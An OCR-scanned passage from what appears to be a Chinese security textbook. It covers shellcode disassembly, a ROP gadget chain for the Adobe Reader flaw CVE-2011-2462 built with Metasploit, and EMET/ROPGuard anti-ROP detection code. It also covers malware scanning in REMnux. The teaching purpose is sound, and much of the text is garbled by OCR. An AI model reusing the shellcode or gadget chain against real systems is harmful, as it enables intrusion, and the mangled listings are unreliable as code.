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seg000:0000004A loc 4A: 

seg000:0000004A jecxz short loc 88 
Seg000:0000004C dec ecx 
seg000:0000004D mov esi, [ebx+ecx*4] 
seg000:00000050 add esi, edx 
seg000:00000052 xor edi, edi 
seg000:00000054 

seg000:00000054 loc 54: 

seg000:00000054 xor eax, eax 
seg000:00000056 lodsb 

seg000:00000057 ror edi, ODh 
seg000:0000005A add edi, eax 
seg000:0000005C cmp al, ah 
seg000:0000005E jnz short loc 54 
seg000:00000060 add edi, [ebp-8] 
seg000:00000063 cmp edi, [ebp«24h 
seg000:00000066 jnz short loc 4A 
seg000:00000068 pop eax 
seg000:00000069 mov ebx, [eax+24h 
seg000:0000006C add ebx, edx 
seg000:0000006E mov cx, [ebx+ecx*2] 
seg000:00000072 mov ebx, [eax+1Ch 
seg000:00000075 add ebx, edx 
seg000:00000077 mov eax, [ebx+ecx*4] 
seg000:0000007A add eax, edx 
seg000:0000007C mov [esp+24h], eax 
seg000:00000080 pop ebx 
seg000:00000081 pop ebx 
seg000:00000082 popa 

seg000:00000083 pop ecx 
seg000:00000084 pop edx 
seg000:00000085 push ecx 
seg000:00000086 jmp eax 
seg000:00000088 

seg000:00000088 loc_88: 

seg000:00000088 pop eax 
seg000:00000089 

seg000:00000089 loc_89: 

seg000:00000089 pop edi 
seg000:0000008A pop edx 
seg000:0000008B mov edx, [edx] 
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seg000:0000008D jmp short loc_15 
seg000:0000008F 
seg000:0000008F loc 8F: 


seg000:0000008F pop ebp 
seg000:00000090 push 1 
seg000:00000092 lea eax, [ebp+0B9h] 


seg000:00000098 push eax 
seg000:00000099 push 876F8B31h 
seg000:0000009E call ebp 
seg000:000000A0 mov ebx, 56A2B5F0h 
seg000:000000A5 push 9DBD95A6h 
seg000:000000AA call ebp 


seg000:000000AC cmp al, 6 
Seg000:000000AE 34 short loc BA 
seg000:000000B0 cmp bl, OEOh 
seg000:000000B3 jnz short loc_BA 
seg000:000000B5 mov ebx, 6F721347h 


seg000:000000BA 
seg000:000000BA loc BA: 
seg000:000000BA 
seg000:000000BA push 0 
seg000:000000BC push ebx 
seg000:000000BD call ebp 
seg000:000000BD 
seg000:000000BF db 63h 
seg000:000000C0 abo 67h el 
seg000:000000C1 obo Sch a d 
seg000:000000C2 ela 63h sce 
seg000:000000C3 db 2Eh ; 
seg000:000000C4 db 65h 
seg000:000000C5 Glo Tisi p. 5x 
seg000:000000C6 db- 65h p 
seg000:000000C7 db 0 
seg000:000000C7 seg000 ends 















































通过 阅读 工具 生成 出 来 的 代码 ， 大 家 可 以 对 shellcode 进一步 加 
深 理解 。 


























E 
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jr 





5.1.5 一 个 ROP 的 实际 例子 
下 面 我 们 以 CVE-2011-2462 为 例 ， 介 绍 一 个 第 3 章 中 曾经 提 到 过 的 
ROP 的 实际 例子 。 
首先 ， 我 们 用 Metasploit 生成 一 个 用 于 攻击 的 PDF 文件 。 
e Adobe Reader U3D Memory Corruption Vulnerability 




















http://www.rapid7.com/db/modules/exploit/windows/fileformat/ 


adobe reader u3d 


V Hi Metasploit 生成 CVE-2011-2462 的 攻击 代码 


[> Metasploit Pro Console 


File Edit View Help 


a- e3 Ale O 


[*] Starting Met jit 


ts and Settings/Campers/.msfá4/local/msf.pdf 





接 下 来 ， 我 们 将 OllyDbg 设 为 实时 调试 器 。 然 后 ， 将 rt3d.dll 的 
ROP 子 程序 运行 之 前 的 地 方 改 为 int3 (0xCC )。 
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V 将 rt3d.dll 8] 0014CAB9 位 置 改 为 OxCC 


Sa Stirling — [rt3d.dll] 

bmp IE REO BRB HEO Dhow)  ^N2UBD 

oela) olo selel] aal [ane] oar a [E| Gy LUE cul | ale! 
ADDRESS — 00 01 02 03 04 05 06 07 s OB 0C OD OE OF 





WE 0] 6A 00 68 EB 00 00 00 51 
WEINE CO C3 55 8B EC 51 8B 01 6A 


50 1C 85 CO OF 95 - 

8D 55 FF 52 51 FF — FUBRO.. j . 15. ROI. 
WEEN 50 10 84 45 FF C9 C3 56 8B F1 8B 46 14 85 CO 4. P.5R./5 VT. t 
WERE OE FF 74 24 08 FF 76 18 56 FF DO 84 CO 74 OC 8B 

WEIR 46 OC 23 44 24 08 F7 D8 1B CO 40 5E C2 04 00 55  .#D$. - .58^7..U 
EB SB EC 83 EC 24 8B 4D 10 OF B? 51 04 8B 45 0C 8B sd $&..10.85.. 
WEEN 00 8B 14 90 6B D2 OC 03 55 08 56 57 52 OF B? 51 Eg. .U. VIR. #0 


n^ OD 14 AN nC D7 NA CD n^ n^ OD n4 oo no RR no tiv = 
[5x00140AB0 | | [EF (2405784 Bytes "Sun E 











用 Adobe Reader 打开 这 个 PDF Xf, OllyDbg 会 自动 打开 ， 我 们 可 
以 查看 一 下 发 生 问题 的 地 方 。 
首先 ， 我 们 将 0xCC 恢复 为 0xFF。 


Y rt3d.dll 中 的 CALL DWORD PTR DS:[EAX+1C] 


288FCRBS[ 51 PUSH ECX 

288FCRB9 CALL DWORD PTR DS:LERX*1C1 
8 TEST _EAX, EAX 

SETNE AL 

RETN 





> 


PUSH EBP 

MOU EBP,ESP 

PUSH ECX 

MOU EAX,DWORD PTR DS:[ECX] 
LEA EDX, DWORD PTR SS: CEBP-1] 
PUSH EDX 


PUSH ECX 

CALL DWORD PTR DS: CEAX+18] 
MOU AL,BYTE PTR SS: CEBP-1] 
LEAVE 


Lm 


RETN 

PUSH ESI 

MOU ESI,ECX 

MOU EAX, Deor PTR DS: [ESI*141 
TEST EAX, EAX 


Seoccnncl..74 AC SUNDT' «+94 oooccncc 


顾名思义 ，ROP ( 面向 返回 编程 ) 就 是 将 一 些 以 返回 (ret 指令 ) 结 
束 的 代码 片段 拼接 起 来 ， 从 而 实现 真正 期 望 的 逻辑 。 在 ROP 中 ， 要 运 
行 的 代码 被 配置 在 栈 中 ， 通 过 巧妙 地 调整 进行 跳 转 并 运行 这 些 代 码 。 简 
单 来 说 ， 就 是 用 ret 代替 jmp 来 进行 跳 转 。 

CVE-2011-2462 中 ， 当 EAX=0C0C0C0C 时 ， 会 执行 下 面 的 逻辑 。 






































T 
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V 通过 ROP 运行 代码 片段 







































4R8B6CEF| 94 zena EAX, ESP A 
4RSB6CFB| COEB 02 SHR BL, 2 S 
nas -F3| 32C9 XOR RL,RL 
|GaecF5| SF POP EDÍ 3 
5E POP ESI = 
ca RETN m 
8B4424 04 MOU EAX, DWORD PTR SS:LESP-*41 
3B4424 08 CMP EAX, DWORD PTR SS:LESP481 
BF94C8 SETE AL 
4 os| C3 RETN 
4R8a86Da4|vE9 97830100 JMP icucnv36.upru free 3 6 toucns 
49896009) 55 PUSH EBP 
4R8a86DOR| SBEC MOU EBP,ESP 
4RS86DaCc| 53 PUSH EBX 
4R886D8D| 56 PUSH ESI 
4A806D0E| 8875 08 MOU ESI, DWORD PTR SS: [EBP+8] 
4A806011| 3308 XOR EBX, EBX 
486013) 391E CMP DWORD PTR DS: [ESI], EE 
4R806D15|v74 52 JE SHORT icucny36, 4Aaa6069 PEE: ERROR. 
4A806017| S95E 10 CMP DWORD PTR DS:[ESI+10], EBX 
4A80ED1IA|v75_05 JNZ SHORT icucny36. 4A806021 EFL 00200246 (NO, EE 
4R886D1C| 395E 14 CMP DWORD PTR OS: CESI+14], EBX STB empty 
4RS86DiF|v?74 SE JE SHORT icucnv36.4R886D5F STi empty 
d4h866021| 8340 08 FF OR DWORD PTR SS: LEBP481,FFFFFFFF. M Banta 








ST2 empty 
3 empty 
empty 





// 代码 

4A806CEF 94 XCHG EAX,ESP 
4A806CF0 COEB 02 SHR BL,2 
4A806CF3 32C0 XOR AL,AL 
4A806CF5 SF POP EDI 
4A806CF6 5E POP ESI 
4A806CF7 C3 RETN 

// & 


0COCOCOC ococococ POP EDI 
0COCOC10 ococococ POP ESI 
ocococl4 ”4A806F29 ”下 一 个 跳 转 目标 


4A806CEF 的 XCHG EAX,ESP 使 得 ESP=0C0C0C0C， 然 后 是 两 条 
POP 指令 ， 最 后 跳 转 到 4A806F29。 其 中 ，RETN 并 没有 返回 原始 调用 
地 址 ， 而 是 跳 转 到 了 下 面 的 代码 。 








// 代码 

4A806F29 5F POP EDI 
4A806F2A 5E POP ESI 
4A806F2B 5D POP EBP 


4A806F2C C2 1400 RETN 14 


// 栈 

ocococig | 4A8A0000 POP EDI 
OCOCOCiC 4A802196 POP ESI 
ocococ20  4A801F90 POP EBP 
0COCOC24  4A806F29 ”下 一 个 跳 转 目标 
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返回 4A806F29 之 后 ， 又 是 3 条 POP 指令 ， 接 下 来 执行 RETN 14. 
跳 转 到 目标 4A806F29 之 后 ， 又 运行 了 一 遍 同样 的 代码 。 
这 些 代码 的 目的 是 逐步 调整 寄存 器 的 值 。 

如 果 和 希望 向 任意 地 址 写 和 数据， 可 以 像 下 面 这 样 进行 拼接 。 









































4A8063A5 ES POP ECX 

4A8063A6 c3 RETN 

4A802196 8901 MOV DWORD PTR DS: [ECX] , EAX 
4A802198 C3 RETN 

4A801F90 58 POP EAX ; <&KERNEL32.CreateFileA> 
4A801F91 C3 RETN 

















J RETN 跳 转 到 CALL EAX 时 ， 就 可 以 调用 CreateFileA。 
上 面 这 样 的 做 法 让 人 感觉 特别 勉强 ,但 现实 中 的 确 可 以 用 来 进行 攻 
因此 ROP 可 以 说 是 一 种 十 分 有 用 的 技巧 。 









































EL 
Inu 
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5.2 用 EMET 观察 反 ROP 的 机 制 


5.2.1 什么 是 EMET 


EMET 全 称 为 Enhanced Mitigation Experience Toolkit ( 增强 减灾 体 
验 工具 )， 是 微软 发 布 的 一 款 免 费 的 漏洞 缓解 工具 。3.0 及 之 前 版 本 中 ， 
其 主要 特长 是 “强化 现 有 的 安全 机 制 "， 从 3.5 版 开始 则 增加 了 一 些 新 的 
实验 性 的 探测 功能 。 

截止 到 现在 (2013/05/10), EMET 的 最 新 版 本 为 4.0B 。 











e Introducing EMET v4 Beta 
http://blogs.technet.com/b/srd/archive/2013/04/18/introducing-emet- 


v4-beta.aspx 








EMET 中 比较 有 意思 的 一 个 功能 是 3.5 版 中 在 现 有 功能 基础 上 新 增 
的 反 ROP ( Anti-ROP ) 机 制 。 

第 3 章 中 我 们 已 经 介绍 过 ， 现 在 的 操作 系统 中 默认 都 开启 了 ASLR, 
DEP ( Exec-Shield ) 等 安全 机 制 ， 因 此 作为 新 的 攻击 手段 ，ROP 正 越 来 
越 受到 重视 ， 而 EMET 正 是 最 早 提出 并 实现 反 ROP 机 制 的 工具 。 




















5.2.2. Anti-ROP 的 设计 获得 了 蓝 帽 奖 
EMET 中 的 Anti-ROP 曾 在 微软 2012 年 举办 的 计算 机 安全 方案 大 赛 
“ 蓝 帽 奖 ”( BlueHat Prize ) 中 获奖 。 


e BlueHat Prize 





http://www.microsoft.com/security/bluehatprize/ 








这 项 大 赛 设置 了 高 额 的 奖金 ， 冠 军 20 万 美元 ， 亚 军 5 万 美元 ， 季 
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军 1 万 美元 。 而 获奖 的 方案 全 部 都 与 ROP 相关 ， 而 且 这 些 方案 都 非常 
实用 。 
各 获奖 者 的 方案 已 经 公开 发 布 在 网 上 ， 大 家 有 兴趣 的 话 一 定 要 读 


一 读 o 








* kBouncer: Efficient and Transparent ROP Mitigation 
http://www.cs.columbia.edu/ vpappas/papers/kbouncer.pdf 

e ROPGuard - runtime prevention of retum-oriented programming attacks 
http://ifsec.blogspot.jp/2012/08/my-bluehat-prize-entry-ropguard- 
runtime.html 

e BlueHat Prize Submission:/ROP 
http://www.vdalabs.com/tools/DeMott BlueHat Submission.pdf 


5.2.3 如何 防止 攻击 


“如 何 保 护 应 用 程序 不 受 新 方法 的 攻击 ”， 这 不 但 是 蓝 帽 奖 的 主题 ， 
同时 也 是 安全 研究 人 员 的 共同 课题 。 安 全 专家 们 相继 发 明了 ASLR、 
Exec-Shield (DEP ), StackGuard 等 安全 机 制 ， 但 即便 如 此 ， 还 是 无 法 根 
绝 所 有 的 漏洞 。 

总 之 ， 安 全 技术 研究 的 目标 在 于 下 面 两 点 。 






































。 保护 应 用 程序 不 受 各 种 漏洞 的 影响 
。 设计 出 不 会 产生 漏洞 的 架构 


作为 蓝 帽 奖 获奖 方案 之 一 的 “ROPGuard - runtime prevention of 
return-oriented programming attacks” 为 我 们 提出 了 一 种 非常 实用 的 应 对 
ROP 的 方法 。 

ROPGuard 简单 来 说 就 是 一 种 检查 “RETN 所 返回 的 目标 有 没有 相 
对 应 的 CALL”( 即 CALL-RETN 匹配 性 ) 的 机 制 。 这 个 方案 非常 简单 ， 
但 是 却 能 够 十 分 有 效 地 检测 出 Return-into-libc 和 ROP 攻击 。 
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我 们 知道 ，CALL 用 来 调用 子 程序 ， 而 在 子 程序 的 结尾 ，( 大 部 分 
情况 下 ) 都 会 执行 RETN ， 而 子 程序 结尾 的 RETN 所 返回 的 目标 地 址 ， 





应 该 就 是 CALL 指令 的 下 面 一 条 指令 。 














然而 ,在 Return-into-libe 攻击 中 ，RETN 会 跳 转 到 函数 的 开头 ， 而 
ROP 攻击 中 则 使 用 了 非常 多 的 RETN， 这 些 都 会 导致 出 现 “RETN 并 不 

















是 返回 CALL 的 下 一 条 指令 ”的 情况 。 


此 ， 这 个 方案 的 本 质 在 于 关注 CALL 和 RETN 的 匹配 性 (调用 栈 





回溯 )， 以 此 来 检测 ROP 和 Return-into-libe 攻击 。 
当然 ， 在 实现 上 也 会 有 很 多 需要 解决 的 难题 ， 














。 在 什么 时 间 点 调用 栈 回溯 
。 在 哪 一 层 进行 检查 


e STARY 


5.2.4 ” 搞 清 楚 加 载 器 的 逻辑 


比如 下 面 这 些 。 


ROPGuard 除了 方案 之 外 ， 还 发 布 了 相应 的 源 代码 。 








大 家 可 以 下 载 原始 的 代码 ， 为 了 便于 本 书 中 的 计 





| 解 ， 笔 者 在 GitHub 上 


发 布 了 一 个 简化 版 ， 省 略 了 一 些 元 余 的 代码 ， 大 家 也 可 以 使 用 这 个 版 本 。 


e ROPGuard-Cheap 
https://github.com/kenjiaiko/ropguard_ cheap 


























本 章 中 我 们 会 使 用 ROPGuard-Cheap 来 进行 讲解 。 当 然 ， 用 原版 也 


没有 问题 ， 只 是 需要 注意 一 点 ， 在 原版 中 , load_rg.exe 的 名 字 叫 
ropguard.exe， 而 ropguard.dll 则 叫 作 ropguarddll.dll. 











下 面 我 们 来 看 一 下 程序 的 逻辑 。 












































这 个 工具 是 通过 DLL 注入 来 保护 目标 进程 的 ， 它 包括 chap0s\ 





ropguard_cheap\Release 中 的 这 两 个 文件 。 
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e load rg.exe ( ropguard.exe ) 


e ropguard.dll ( ropguarddll.dll ) 


load rg.exe 实质 上 只 是 一 个 加 载 器 ， 真 正 关 于 Anti-ROP 的 逻辑 都 
在 one 中 。 
， 为 了 确认 ， 我 们 还 是 先 来 看 一 看 load_rg.exe。 
nis VC++2010 打开 ropguard\ropguard.sIn 文件 。 这 个 工程 
包含 以 下 文件 ( 源 代码 见 chap0S\ropguard cheap ， 此 处 省 略 源 代 码 )。 








L 


e main.cpp ( load_rg\main.cpp ) 

e createprocess.cpp ( common\createprocess.cpp ) 

e patchentrypoint.cpp ( common patchentrypoint.cpp ) 
* debug.cpp ( common\debug.cpp ) 














其 中 main.cpp 主要 包含 main 函数 以 及 相关 逻辑 ， 它 的 功能 是 从 参 
数 中 获取 进程 ID 或 者 可 执行 文件 的 路 径 ， 然 后 向 目标 进程 注入 DLL 


( ropguard.dll )。 
根据 参数 的 不 同 ， 会 分 别 调用 下 面 两 个 函数 。 




















e 进程 ID : 调用 GuardExistingProcess 
e 可 执行 文件 路 径 : 调用 CreateNewGuardedProcess 








这 些 逻 辑 位 于 createprocess.cpp 中 ， 在 这 个 文件 中 还 包含 下 面 的 
逻辑 。 


. 向 目标 进 井 程 注入 DLL 
e 劫持 CreateProcesslnternalW， 让 进程 暂停 运行 ( 添加 CREATE. 


SUSPENDED 标志 





CreateProcessInternalW 的 钩子 用 于 DLL 中 的 逻辑 ， 加 载 器 并 不 使 
JE. 此 外 ， 请 大 家 同时 确认 一 下 patchentrypoint.cpp， 这 个 程序 中 的 
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PatchEntryPoint 函数 可 以 将 其 他 函数 的 和 人 口 临 时 改 为 死 循 环 (FB FE), 
目的 是 等 待 DLL 注入 完成 。 





5.2.5 DLL 的 程序 逻辑 

接 下 来 我 们 来 看 看 DLL 中 包含 怎样 的 逻辑 。 

请 大 家 看 chap05wopguard cheapwopguard 中 的 dllmain.cpp ， 这 里 进 
行 了 ROPGuard 类 的 定义 以 及 全 局 声明 。 用 ReadROPSettings 读 取 配 置 ， 
再 用 PatchFunctions 给 各 函数 打 补 丁 。 

假设 我 们 对 WinExec 函数 打 补 丁 ， 其 结果 是 将 WinExec 的 开头 替 
换 成 jmp 指令 。 








Y kernel32:WinExec ( 打 补 丁 前 ) 


7C8623AD > 8BFF MOV EDI,EDI 
7C8623AF 55 PUSH EBP 
7C8623B0 8BEC MOV EBP,ESP 
7C8623B2 83EC 54 SUB ESP,54 
7C8623B5 53 PUSH EBX 


我 们 将 开头 的 5 个 字 节 改 为 jmp 指令 看 看 。 


Y kernel32:WinExec ( 打 补 丁 后 ) 


7C8623AD »-E9 4EDC2D84 JMP 00840000 
7C8623B2 83EC 54 SUB ESP,54 
7C8623B5 53 PUSH EBX 





由 于 jmp 指令 需要 占用 5 个 字 节 ， 因 此 函数 开头 原本 的 内 容 会 被 覆盖 


* MOV EDI,EDI 
e PUSH EBP 
e MOV EBP,ESP 





上 面 的 内 容 会 被 替换 成 JMP 00B40000。 这 样 一 来 ， 当 调用 WinExec 
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时 ， 程 序 会 跳 转 到 00B40000。 
那么 让 我 们 看 看 00B40000 的 指令 是 什么 。 


// 00B40000 

00B40000 81EC 04000000 SUB ESP,4 

00B40006 60 PUSHAD 

00B40007 54 PUSH ESP 

00B40008 68 F876D329 PUSH 29D376F8 
00B4000D E8 7E344COF CALL ropguard.10003490 
00840012 81C4 24000000 ADD ESP,24 





00B40018 8BFF MOV EDI,EDI 
00B4001A 55 PUSH EBP 
00B4001B 8BEC MOV EBP, ESP 


00B4001D -E9 9023D27B JMP kernel32.7C8623B2 
最 后 的 JMP kernel32.7C8623B2 会 跳 转 到 WinExec 开头 的 jmp 指令 

后 面 。 
而 被 jmp 指令 覆盖 掉 的 那些 指令 ， 则 被 移动 到 了 00B40018 Jr: É 


























o 





* MOV EDI,EDI 
e PUSH EBP 
* MOV EBP,ESP 





也 就 是 说 ， 我 们 等 于 恢复 了 原本 的 WinExec 逻辑 。 

CALL ropguard.10003490 是 一 个 判断 逻辑 ， 用 来 判断 WinExec 是 否 
TE ROP 下 被 运行 ， 也 就 是 说 ， 这 里 调用 了 一 个 检查 子 程序 。 

为 各 困 数 打 好 补丁 之 后 ， 当 这 些 函 数 被 调用 的 时 候 ， 就 会 自动 运行 
hr A EEF o 























E 


5.2.6 CALL-RETN 检查 


我 们 来 看 一 个 最 简单 的 CALL-RETN 检查 ( 源 代 码 见 chap05\ 


ropguard_cheap\common )。 
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Y ropcheck.cpp 
// xopcheck.cpp 


#include <stdio.h> 
#include <windows.h> 


#include "ropsettings.h" 
#include "debug.h" 


#include <iostream> 
#include <fstream> 


#include <string> 








#include <sstream> 
using namespace std; 


void ReportPossibleROP(string &report) 
{ 
string messageboxtext; 
messageboxtext = "" 
"ROPGuard has detected a possible threat.\n" 
"Problem details:\n\n" + report; 
if (MessageBoxA (Get ForegroundWindow(), 
messageboxtext.c str(), "ROPGuard", MB OKCANCEL) == IDOK) 


ExitProcess(1); 


int PrecededByCall(unsigned char *address) 





if(*(address-5) == 0xE8) 
Š A // ROP 检 查 子 程序 ， 
d c 在 CheckReturnAddress 中 调用 
return 0; 


int CheckReturnAddress( 
DWORD returnAddress, DWORD functionAddress, DWORD *registers) 


if(!PrecededByCall((unsigned char *)returnAddress))( 

















stringstream errorreport; // 调用 CheckReturnAddress 





errorreport << "Return address not preceded by call. Wn"; 


registers)) Hi 














currentFunction = &(guardedFunctions[il); 


break; 


} 


if (!currentFunction) { 


return; 


DWORD returnAddress = *((DWORD *) 


(stackPointer + GetROPSettings()-»preserveStack)); 


if (!CheckReturnAddress (returnAddress, functionAddress, 7 








始 检查 





return; 





// 在 此 处 添加 新 的 检查 代码 


return; 
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errorreport «« "Return address: " «« std::hex «« 7 
returnAddress; 
ReportPossibleROP(errorreport.str()); 
return 0; 
) 
return 1; 
void X stdcall ROPCheck ( 
unsigned long functionAddress, unsigned long *registers) 
if(!protectionEnabled) 
return; 
unsigned long framePointer - registers[2]; 
unsigned long stackPointer = registers[3]; 
int i; 
int numFunctions = GetNumGuardedFunctions(); 
ROPGuardedFunction *guardedFunctions - GetGuardedFunctions(); 
ROPGuardedFunction *currentFunction - NULL; 
for(i=0; i < numFunctions; i++) { 
if(guardedFunctions[i].originalAddress == functionAddress) { 
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用 汇编 语言 来 表示 call 指令 需要 占用 5 个 字 节 。 























00469127 |. 3D 21210000 CMP EAX,2121 

0046912C |. 72 0E JB SHORT 0046913C 

0046912E E8 5DFF4990 CALL 90909090 // 占用 5 个 字 节 
00469133 90 NOP 

00469134 90 NOP 


也 就 是 E8+ 调用 地 址 ， 一 共 5 个 字 节 。 
由 于 这 5 个 字 节 肯定 是 以 E8 开头 的 ， 因 此 PrecededByCall 中 会 判 
断 “ 返 回 目标 地 址 向 前 5 个 字 节 是 否 为 E8”， 如 果 是 则 返回 1， 代 表 检 
测 到 匹配 的 call 指令 ， 属 于 正常 调用 的 返回 。 

如 果 返 回 目标 地 址 向 前 5 个 字 节 不 是 E8， 则 有 可 能 是 ROP， 因 此 
返回 0， 并 显示 ReportPossibleROP 消息 。 





























a 











Mn 











5.2.7. ”如 何 防止 误 判 
这 样 简单 粗暴 的 方法 貌似 很 容易 误 判 ， 因 为 并 非 所 有 的 call 都 是 5 
节 








WE 


o 


v 2 个 字 节 的 情况 


00469127 |. 3D 21210000 CMP EAX,2121 

0046912C |. 72 OE JB SHORT 0046913C 
0046912E FFDO CALL EAX 只 有 2 个 字 节 
00469130 90 NOP 

00469131 90 NOP 


v 还 有 7 个 字 节 的 情况 


00469127 3D 21210000 CMP EAX,2121 
0046912C 72 OE JB SHORT 0046913C 
0046912E 9A 90909090 9090 CALL FAR 9090:90909090 
00469135 90 NOP 7 个 字 节 也 可 以 


00469136 90 NOP 
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要 防止 误 判 ， 必 须 考 虑 到 所 有 不 同 长 度 的 call 指令 以 及 不 同 的 指 
值 。 比 如 说 ， 有 些 call 只 需要 3 个 字 节 。 

此 外 ， 我 们 还 可 以 检查 当前 所 在 地 址 是 否 就 是 call 的 目标 地 址 。 例 
lll CALL EAX 时， 可 以 检查 EAX 和 EIP 的 值 是 否 一 致 。 





5.2.8 检查 栈 的 合法 性 
除了 CALL-RETN 匹配 性 之 外 ， 还 有 什么 可 以 检查 的 要 素 呢 ? 
比如 说 ， 如 果 可 以 获取 栈 的 地 址 范围 ， 并 检查 esp. ebp 寄存 器 的 值 
是 否 位 于 该 范围 内 ， 也 能 够 识别 出 异常 调用 。 








int CheckStackPointer (unsigned long stackPtr) 
{ 
unsigned long stackBottom, stackTop; 
GetStackInfo(&stackBottom, &stackTop) ; 


if((stackPtr « stackBottom) || (stackTop < stackPtr)) { 
stringstream errorreport; 
errorreport << "Stack pointer is "; 
errorreport << "outside of stack. Stack address: n"; 
errorreport << std::hex << stackPtr; 
Report PossibleROP(errorreport.str()); 


return 0; 


} 


return 1; 





上 面 的 程序 可 以 获取 栈 的 上 限 和 下 限 地 址 ， 并 检查 esp 是 否 位 于 该 
范围 内 。 这 个 逻辑 也 可 以 用 于 检查 ebp。 

此 外 ， 由 于 栈 永远 是 向 下 低位 方向 ) 增长 的 ， 因 此 ebp 必然 要 大 
于 esp， 我 们 也 可 以 对 这 一 点 进行 检查 。 














int CheckStackFrames (DWORD *stackPtr, DWORD *framePtr) 


{ 
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DWORD *returnAddress; 
DWORD *newFramePtr; 
DWORD *originalFramePtr; 


unsigned long stackBottom, stackTop; 
GetStackInfo(&stackBottom, &stackTop); 


originalFramePtr - framePtr; 


// frame pointer must point to the stack 
if(((unsigned long)framePtr « stackBottom) || 
((unsigned long)framePtr » stackTop)) 


stringstream errorreport; 

errorreport «« "Return address not "; 

errorreport << "preceded by call. Frame pointer: Mn"; 
errorreport «« std::hex «« (unsigned long)framePtr; 
ReportPossibleROP(errorreport.str()); 


return 0; 


if(((unsigned long)framePtr) < ((unsigned long)stackPtr))[ 
stringstream errorreport; 


errorreport << "Frame pointer is above stack pointer on 7 
Stack"; 


errorreport << " Stack pointer: "; 

errorreport «« std::hex «« (unsigned long)stackPtr; 
enrorreport < rame pointeri, 

errorreport << std::hex «« (unsigned long)framePtr; 
ReportPossibleROP (errorreport.str()); 

return 0; 


另外， 函数 的 返回 目标 地 址 是 存放 在 栈 中 的 ， 因 此 我 们 可 以 通过 
ebp 进行 回溯 ， 找 到 上 一 个 和 再 上 一 个 返回 目标 地 址 。 

这 种 方法 被 称 为 栈 跟 踪 ( stack trace )。 通 过 栈 跟踪 ， 我 们 可 以 确认 
调用 中 的 各 个 ebp 是 否 位 于 栈 的 地 址 范围 内 。 






































for (unsigned int i=0; i«GetROPSettings()-»maxStackFrames; i++) { 
newFramePtr = (DWORD *) (*(framePtr) ) ; 











5.2 





dH 
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returnAddress = (DWORD *) (*(framePtr+1)); 
if (!returnAddress) break; 


if (!PrecededByCall( (unsigned char *)returnAddress)) { 
stringstream errorreport; 
errorreport << "Return address not preceded by call."; 
errorreport << " Return address: "; 
errorreport << std::hex << (unsigned long) 
returnAddress; 


errorreport «« Frame pointer: "; 


errorreport «« std::hex «« (unsigned long)framePtr; 


errorreport «« Original frame pointer: "; 





errorreport «« std::hex «« (unsigned long) 
originalFramePtr; 
ReportPossibleROP(errorreport.str()); 


return 0; 


if(((unsigned long)newFramePtr « stackBottom) | | 


((unsigned long)newFramePtr > stackTop) ) 


stringstream errorreport; 

errorreport << "Frame pointer is outside of stack."; 

errorreport << " Frame pointer: "; 

errorreport << std::hex << (unsigned long) framePtr; 

errorreport << " Original frame pointer: "; 

errorreport << std::hex << (unsigned long) 
originalFramePtr; 

ReportPossibleROP(errorreport.str()); 


return 0; 


if((unsigned long)newFramePtr <= (unsigned long) framePtr) { 
stringstream errorreport; 
errorreport << "Next frame pointer is not "; 
errorreport << "below the previous one on stack."; 
errorreport << " Frame pointer: "; 
errorreport << std::hex << (unsigned long) framePtr; 
errorreport << " Original frame pointer: "; 
errorreport << std::hex << (unsigned long) 


originalFramePtr; 
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ReportPossibleROP (errorreport.str()); 
return 0; 


} 


framePtr = newFramePtr; 


} 


return 1; 














上 面 我 们 看 了 一 些 ROP 检查 的 例子 。 
关于 更 加 详细 的 内 容 ， 大 家 可 以 读 一 读 各 获奖 者 的 论文 、 博 客 以 及 
源 代码 。 此 外 ， 大 家 也 可 以 尝试 自己 编写 一 些 原 创 的 检测 子 程序 。 
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5.3 用 REMnux 分 析 恶 意 软 件 


5.3.1 什么 是 REMnux 

刚才 我 们 介绍 了 关于 漏洞 和 攻击 的 知识 ， 接 下 来 我 们 来 看 一 看 恶意 
软件 。 

REMnux 是 一 个 用 于 分 析 恶意 软件 的 操作 系统 ， 基 于 Ubuntu 开发， 
主要 用 于 在 VMware 等 虚拟 环境 下 运行 。 

大 家 可 以 从 sourceforge.net 下 载 最 新 版 。 












































e REMnux 
http://zeltser.com/remnux/ 


http://sourceforge.net/projects/remnux/files/version3/ 


V 在 VMware 上 运行 REMnux 


RE lips remnux@remnux: ~ 


" Ele Edit Tabs Help 


$e remnux@remnux:~$ $ 


REM Report 
Template. 








CORBET AAT SERN SASL, Otra PLUTE. ERELEDEE) vmware 











] 户 名 和 密码 如 下 所 示 。 
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e HAZ: remnux 
e 密码 : malware 





由 于 这 是 一 个 基于 Ubuntu 的 系统 ， 因 此 用 root 运行 程序 时 需要 使 


用 sudo 命令 。Root 的 密码 也 是 malware. 








5.3.2 更 新 特征 数据 库 
首先 我 们 来 更 新 一 下 恶意 软件 的 特征 数据 库 。 
请 大 家 按照 下 面 的 例子 ， 用 root 运行 freshclam 命令 。 





V 运行 示例 
$ sudo freshclam 
[sudo] password for remnux: malware 输入 密码 
ClamAV update process started at Sat May 19 13:54:14 2012 
省 略 
WARNING: Incremental update failed, trying to download daily.cvd 
Downloading daily.cvd [100$] 
Downloading bytecode-158.cdiff [100% 
省 略 
Downloading bytecode-180.cdiff [100$] 
省 略 


5.8.8 扫描 目录 

下 面 我 们 来 扫描 恶意 软件 。 

主 文件 夹 /home/remnux 中 有 一 个 名 叫 jsunpackn 的 目录 ， 我 们 来 对 
这 个 目录 进行 一 下 完整 扫描 。 


扫描 目录 需要 使 用 clamscan 命令 。 









































v 运行 示例 


$ clamscan jsunpackn/ 
jsunpackn/CHANGELOG: OK 
jsunpackn/COPYING: OK 
jsunpackn/INSTALL: OK 





t 
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jsunpackn/INSTALL.spidermonkey: OK 
jsunpackn/INSTALL.spidermonkey.shellcode: OK 
省 略 
sunpackn/rules: OK 

sunpackn/rules.ascii: OK 

sunpackn/samples.tgz: Exploit.PDF-4897 FOUND 发 现 


sunpackn/swf.py: OK 








sunpackn/urlattr.py: OK 


T SCAN SUMMARY ----------- 
Known viruses: 1217159 

Engine version: 0.97.3 

Scanned directories: 1 

Scanned files: 23 

Infected files: 1 

Data scanned: 0.46 MB 

Data read: 2.30 MB (ratio 0.20:1) 
Time: 3.824 sec (0 m 3 s) 


我 们 在 jsunpackn 目录 中 检测 到 了 一 个 恶意 软件 ， 位 于 jsunpackn/ 
samples.tgz， 类 型 为 Exploit.PDF-4897。REMnux 不 仅 能 检测 x86 和 
Windows 上 的 恶意 软件 ， 还 能 够 检测 出 Android 上 的 恶意 软件 ， 例 如 非 
常 有 名 的 DroidDream。 
































v 运行 示例 


$ clamscan DDream-444578756853741426-Super.apk 
